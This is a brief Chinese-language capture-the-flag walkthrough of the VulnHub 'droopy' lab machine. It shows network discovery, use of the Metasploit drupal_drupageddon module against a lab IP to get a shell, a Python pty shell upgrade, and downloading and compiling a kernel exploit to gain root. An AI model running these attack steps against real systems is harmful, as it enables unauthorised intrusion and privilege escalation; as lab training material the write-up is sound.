靶机-droopyCTF Walkthrough

droopyCTF

https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm

CTF镜像合集：https://www.vulnhub.com/?page=18

参考：https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/

提权辅助工具LinEnum下载：https://download.csdn.net/download/weixin_41082546/11609409
提权辅助工具linuxprivchecker下载：https://download.csdn.net/download/weixin_41082546/11609428

 

1.获取目标ip地址，并进行端口发现，目标只开启了80端口

netdiscover -i eth0 -r 192.168.88.1/24

访问web页面

 

Drupal 7 应该是一个类似于wordpress的一个开源的框架

searchsploit Drupal 7 搜索相关漏洞

使用 msf 利用 漏洞

use exploit/multi/http/drupal_drupageddon

set rhosts 192.168.88.200

exploit

利用注入漏洞上传payload 获得shell

搜索内核相关漏洞信息

使用 pty 获取完整性shell

python -c 'import pty; pty.spawn("/bin/bash")'

开启web，使用 wget 将 漏洞利用代码下载到目标机器

 

编译.c文件,执行漏洞利用程序，成功获得root权限。